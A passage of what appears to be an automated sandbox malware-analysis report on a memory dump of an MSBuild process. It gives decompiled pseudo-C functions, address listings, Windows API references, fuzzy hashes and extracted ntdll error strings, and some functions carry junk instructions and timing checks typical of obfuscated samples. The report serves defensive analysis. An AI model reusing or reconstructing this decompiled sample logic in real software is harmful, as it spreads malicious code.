                                            						_t50 = 0x4f;
                                            						while(1) {
                                            							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                                            							_t56 = _t56 + 0x10;
                                            							if(_t31 != 0) {
                                            								break;
                                            							}
                                            							_t50 = _t50 + 1;
                                            							if(_t50 <= 0x62) {
                                            								continue;
                                            							} else {
                                            							}
                                            							goto L8;
                                            						}
                                            						_t9 = _t52 + 0x14; // 0xffffe045
                                            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                            						_t39 = 1;
                                            						L8:
                                            						_t33 = E004080E0( &_v24,  &_v840);
                                            						_t55 = _t56 + 8;
                                            					} while (_t33 != 0 && _t39 == 0);
                                            					_t34 = E00408160(_t52,  &_v24); // executed
                                            					if(_t39 == 0) {
                                            						asm("rdtsc");
                                            						asm("rdtsc");
                                            						_v8 = _t34 - 0 + _t34;
                                            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                            					}
                                            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                            					_t20 = _t52 + 0x31; // 0x5608758b
                                            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                            					return 1;
                                            				} else {
                                            					return _t24;
                                            				}
                                            			}



















                                            0x00409abb
                                            0x00409ac3
                                            0x00409ac5
                                            0x00409aca
                                            0x00409acf
                                            0x00409ae2
                                            0x00409ae7
                                            0x00409af0
                                            0x00409afc
                                            0x00409b0f
                                            0x00409b14
                                            0x00409b17
                                            0x00409b20
                                            0x00409b32
                                            0x00409b37
                                            0x00409b3c
                                            0x00000000
                                            0x00000000
                                            0x00409b3e
                                            0x00409b42
                                            0x00000000
                                            0x00000000
                                            0x00409b44
                                            0x00000000
                                            0x00409b42
                                            0x00409b46
                                            0x00409b49
                                            0x00409b4f
                                            0x00409b51
                                            0x00409b5c
                                            0x00409b61
                                            0x00409b64
                                            0x00409b71
                                            0x00409b7c
                                            0x00409b7e
                                            0x00409b84
                                            0x00409b88
                                            0x00409b8b
                                            0x00409b8b
                                            0x00409b92
                                            0x00409b95
                                            0x00409b9a
                                            0x00409ba7
                                            0x00409ad6
                                            0x00409ad6
                                            0x00409ad6

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                            • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3 41a630-41a661 call 41af60 RtlAllocateHeap
                                            C-Code - Quality: 100%
                                            			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                            				void* _t10;
                                            				void* _t15;
                                            
                                            				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                            				_t6 =  &_a8; // 0x414536
                                            				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                            				return _t10;
                                            			}





                                            0x0041a647
                                            0x0041a652
                                            0x0041a65d
                                            0x0041a661

                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 201 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a480 210->212 213 40838d 210->213 212->213 213->211
                                            C-Code - Quality: 82%
                                            			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                            				char _v67;
                                            				char _v68;
                                            				void* _t12;
                                            				intOrPtr* _t13;
                                            				int _t14;
                                            				long _t21;
                                            				intOrPtr* _t25;
                                            				void* _t26;
                                            				void* _t30;
                                            
                                            				_t30 = __eflags;
                                            				_v68 = 0;
                                            				E0041BE60( &_v67, 0, 0x3f);
                                            				E0041CA00( &_v68, 3);
                                            				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                                            				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                            				_t25 = _t13;
                                            				if(_t25 != 0) {
                                            					_t21 = _a8;
                                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                            					_t32 = _t14;
                                            					if(_t14 == 0) {
                                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                            					}
                                            					return _t14;
                                            				}
                                            				return _t13;
                                            			}












                                            0x00408310
                                            0x0040831f
                                            0x00408323
                                            0x0040832e
                                            0x0040833e
                                            0x0040834e
                                            0x00408353
                                            0x0040835a
                                            0x0040835d
                                            0x0040836a
                                            0x0040836c
                                            0x0040836e
                                            0x0040838b
                                            0x0040838b
                                            0x00000000
                                            0x0040838d
                                            0x00408392

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 237 41a7c1-41a7ea call 41af60 239 41a7ef-41a804 LookupPrivilegeValueW 237->239
                                            C-Code - Quality: 25%
                                            			E0041A7C1(void* __eax, void* __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                            				void* _v117;
                                            				int _t13;
                                            				void* _t20;
                                            
                                            				asm("aam 0xac");
                                            				asm("std");
                                            				asm("out dx, eax");
                                            				asm("sbb al, 0x7a");
                                            				asm("out 0x80, al");
                                            				asm("enter 0x5799, 0xff");
                                            				_t10 = _a4;
                                            				E0041AF60(_t20, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                                            				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                            				return _t13;
                                            			}






                                            0x0041a7c1
                                            0x0041a7c3
                                            0x0041a7c4
                                            0x0041a7c5
                                            0x0041a7c7
                                            0x0041a7c9
                                            0x0041a7d3
                                            0x0041a7ea
                                            0x0041a800
                                            0x0041a804

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 98f29c0fe56ab57662b43daf8e9872967a0ae3dad624b545ce3177a85e3d58e0
                                            • Instruction ID: 903d9b1558472719a7454343ffe1c0d941e057e6130617f6b0d07f0e0b71f619
                                            • Opcode Fuzzy Hash: 98f29c0fe56ab57662b43daf8e9872967a0ae3dad624b545ce3177a85e3d58e0
                                            • Instruction Fuzzy Hash: BDF0A0B16002086FDB10EF75CC80EDB3B69AF45254F108568F94D97242C935D415CBB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 246 41a670-41a6a1 call 41af60 RtlFreeHeap
                                            C-Code - Quality: 100%
                                            			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                            				char _t10;
                                            				void* _t15;
                                            
                                            				_t3 = _a4 + 0xc74; // 0xc74
                                            				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}





                                            0x0041a67f
                                            0x0041a687
                                            0x0041a69d
                                            0x0041a6a1

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 249 41a7d0-41a7e9 250 41a7ef-41a804 LookupPrivilegeValueW 249->250 251 41a7ea call 41af60 249->251 251->250
                                            C-Code - Quality: 100%
                                            			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                            				int _t10;
                                            				void* _t15;
                                            
                                            				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}





                                            0x0041a7ea
                                            0x0041a800
                                            0x0041a804

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 252 41a6a3-41a6d8 call 41af60 ExitProcess
                                            C-Code - Quality: 37%
                                            			E0041A6A3() {
                                            				void* _t10;
                                            				void* _t12;
                                            				void* _t16;
                                            				void* _t17;
                                            
                                            				asm("outsb");
                                            				asm("sti");
                                            				asm("wait");
                                            				asm("aam 0xd");
                                            				 *0x57ef8ce2 =  *0x57ef8ce2 - _t10;
                                            				asm("enter 0x8b55, 0xec");
                                            				_t16 = _t17;
                                            				_t5 =  *((intOrPtr*)(_t16 + 8));
                                            				E0041AF60(_t12,  *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 8)) + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                            				ExitProcess( *(_t16 + 0xc));
                                            			}







                                            0x0041a6a3
                                            0x0041a6a4
                                            0x0041a6a5
                                            0x0041a6a6
                                            0x0041a6a8
                                            0x0041a6af
                                            0x0041a6b1
                                            0x0041a6b3
                                            0x0041a6ca
                                            0x0041a6d8

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: d6f0c36ffe6243364bbf69e09870d309ac9f268e838ebd79ce14f1644b1d172f
                                            • Instruction ID: e3ca366fad39fe9560296a5e4a17f1b51b98890b2822ea8c7a60d792304ed000
                                            • Opcode Fuzzy Hash: d6f0c36ffe6243364bbf69e09870d309ac9f268e838ebd79ce14f1644b1d172f
                                            • Instruction Fuzzy Hash: CFE08CB16023007AD321CF75CC89F873B68AF88B60F1485AAF9586F342CA31A644C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A6B0(intOrPtr _a4, int _a8) {
                                            				void* _t10;
                                            
                                            				_t5 = _a4;
                                            				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                            				ExitProcess(_a8);
                                            			}




                                            0x0041a6b3
                                            0x0041a6ca
                                            0x0041a6d8

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7747dfd850c1bc4ed2c89955809e62ec93244d0a093f6b78868063c8b92207b6
                                            • Instruction ID: fbc3ad36472fa58d73699deddb0df04f80228b6475714041c54c916d83184f80
                                            • Opcode Fuzzy Hash: 7747dfd850c1bc4ed2c89955809e62ec93244d0a093f6b78868063c8b92207b6
                                            • Instruction Fuzzy Hash: CFB09BB19424C5C7D752E7A446087177E44B7D4745F16C076D1420641B4778C0D1F6B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • The critical section is owned by thread %p., xrefs: 010BB3B9
                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 010BB314
                                            • *** An Access Violation occurred in %ws:%s, xrefs: 010BB48F
                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 010BB323
                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 010BB53F
                                            • read from, xrefs: 010BB4AD, 010BB4B2
                                            • *** Inpage error in %ws:%s, xrefs: 010BB418
                                            • *** enter .exr %p for the exception record, xrefs: 010BB4F1
                                            • <unknown>, xrefs: 010BB27E, 010BB2D1, 010BB350, 010BB399, 010BB417, 010BB48E
                                            • write to, xrefs: 010BB4A6
                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010BB3D6
                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 010BB305
                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 010BB47D
                                            • *** enter .cxr %p for the context, xrefs: 010BB50D
                                            • a NULL pointer, xrefs: 010BB4E0
                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 010BB39B
                                            • *** then kb to get the faulting stack, xrefs: 010BB51C
                                            • Go determine why that thread has not released the critical section., xrefs: 010BB3C5
                                            • an invalid address, %p, xrefs: 010BB4CF
                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 010BB476
                                            • The resource is owned exclusively by thread %p, xrefs: 010BB374
                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 010BB352
                                            • The instruction at %p referenced memory at %p., xrefs: 010BB432
                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 010BB2F3
                                            • This failed because of error %Ix., xrefs: 010BB446
                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 010BB2DC
                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010BB38F
                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 010BB484
                                            • The instruction at %p tried to %s , xrefs: 010BB4B6
                                            • The resource is owned shared by %d threads, xrefs: 010BB37E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                            • API String ID: 0-108210295
                                            • Opcode ID: 184b4bd83a4325d4bc726ffd7cd36cc477e0e337efa359e3553501d6bb8b41ae
                                            • Instruction ID: 1fde22d987d168db7ba12b754521178da52e7fd435a305bf961e818314efa73b
                                            • Opcode Fuzzy Hash: 184b4bd83a4325d4bc726ffd7cd36cc477e0e337efa359e3553501d6bb8b41ae
                                            • Instruction Fuzzy Hash: 6A811131A00204FFDB266B0ADC95EFF3B66BF56B51F004085F6842B1A2D7A5C541EBB2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E010C1C06() {
                                            				signed int _t27;
                                            				char* _t104;
                                            				char* _t105;
                                            				intOrPtr _t113;
                                            				intOrPtr _t115;
                                            				intOrPtr _t117;
                                            				intOrPtr _t119;
                                            				intOrPtr _t120;
                                            
                                            				_t105 = 0xfe48a4;
                                            				_t104 = "HEAP: ";
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0100B150();
                                            				} else {
                                            					E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push( *0x10f589c);
                                            				E0100B150("Heap error detected at %p (heap handle %p)\n",  *0x10f58a0);
                                            				_t27 =  *0x10f5898; // 0x0
                                            				if(_t27 <= 0xf) {
                                            					switch( *((intOrPtr*)(_t27 * 4 +  &M010C1E96))) {
                                            						case 0:
                                            							_t105 = "heap_failure_internal";
                                            							goto L21;
                                            						case 1:
                                            							goto L21;
                                            						case 2:
                                            							goto L21;
                                            						case 3:
                                            							goto L21;
                                            						case 4:
                                            							goto L21;
                                            						case 5:
                                            							goto L21;
                                            						case 6:
                                            							goto L21;
                                            						case 7:
                                            							goto L21;
                                            						case 8:
                                            							goto L21;
                                            						case 9:
                                            							goto L21;
                                            						case 0xa:
                                            							goto L21;
                                            						case 0xb:
                                            							goto L21;
                                            						case 0xc:
                                            							goto L21;
                                            						case 0xd:
                                            							goto L21;
                                            						case 0xe:
                                            							goto L21;
                                            						case 0xf:
                                            							goto L21;
                                            					}
                                            				}
                                            				L21:
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0100B150();
                                            				} else {
                                            					E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push(_t105);
                                            				E0100B150("Error code: %d - %s\n",  *0x10f5898);
                                            				_t113 =  *0x10f58a4; // 0x0
                                            				if(_t113 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0100B150("Parameter1: %p\n",  *0x10f58a4);
                                            				}
                                            				_t115 =  *0x10f58a8; // 0x0
                                            				if(_t115 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0100B150("Parameter2: %p\n",  *0x10f58a8);
                                            				}
                                            				_t117 =  *0x10f58ac; // 0x0
                                            				if(_t117 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0100B150("Parameter3: %p\n",  *0x10f58ac);
                                            				}
                                            				_t119 =  *0x10f58b0; // 0x0
                                            				if(_t119 != 0) {
                                            					L41:
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push( *0x10f58b4);
                                            					E0100B150("Last known valid blocks: before - %p, after - %p\n",  *0x10f58b0);
                                            				} else {
                                            					_t120 =  *0x10f58b4; // 0x0
                                            					if(_t120 != 0) {
                                            						goto L41;
                                            					}
                                            				}
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0100B150();
                                            				} else {
                                            					E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				return E0100B150("Stack trace available at %p\n", 0x10f58c0);
                                            			}











                                            0x010c1c10
                                            0x010c1c16
                                            0x010c1c1e
                                            0x010c1c3d
                                            0x010c1c3e
                                            0x010c1c20
                                            0x010c1c35
                                            0x010c1c3a
                                            0x010c1c44
                                            0x010c1c55
                                            0x010c1c5a
                                            0x010c1c65
                                            0x010c1c67
                                            0x00000000
                                            0x010c1c6e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c1c67
                                            0x010c1cdc
                                            0x010c1ce5
                                            0x010c1d04
                                            0x010c1d05
                                            0x010c1ce7
                                            0x010c1cfc
                                            0x010c1d01
                                            0x010c1d0b
                                            0x010c1d17
                                            0x010c1d1f
                                            0x010c1d25
                                            0x010c1d30
                                            0x010c1d4f
                                            0x010c1d50
                                            0x010c1d32
                                            0x010c1d47
                                            0x010c1d4c
                                            0x010c1d61
                                            0x010c1d67
                                            0x010c1d68
                                            0x010c1d6e
                                            0x010c1d79
                                            0x010c1d98
                                            0x010c1d99
                                            0x010c1d7b
                                            0x010c1d90
                                            0x010c1d95
                                            0x010c1daa
                                            0x010c1db0
                                            0x010c1db1
                                            0x010c1db7
                                            0x010c1dc2
                                            0x010c1de1
                                            0x010c1de2
                                            0x010c1dc4
                                            0x010c1dd9
                                            0x010c1dde
                                            0x010c1df3
                                            0x010c1df9
                                            0x010c1dfa
                                            0x010c1e00
                                            0x010c1e0a
                                            0x010c1e13
                                            0x010c1e32
                                            0x010c1e33
                                            0x010c1e15
                                            0x010c1e2a
                                            0x010c1e2f
                                            0x010c1e39
                                            0x010c1e4a
                                            0x010c1e02
                                            0x010c1e02
                                            0x010c1e08
                                            0x00000000
                                            0x00000000
                                            0x010c1e08
                                            0x010c1e5b
                                            0x010c1e7a
                                            0x010c1e7b
                                            0x010c1e5d
                                            0x010c1e72
                                            0x010c1e77
                                            0x010c1e95

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 0-2897834094
                                            • Opcode ID: 088abc9fa28128cee729212e91c023ebc8c54220c054a2c02c8b60fc02508183
                                            • Instruction ID: 23e6b1c729e31b18e6d1fbfc2fce3c886d424658bcd6c7b36647bc0080c23e24
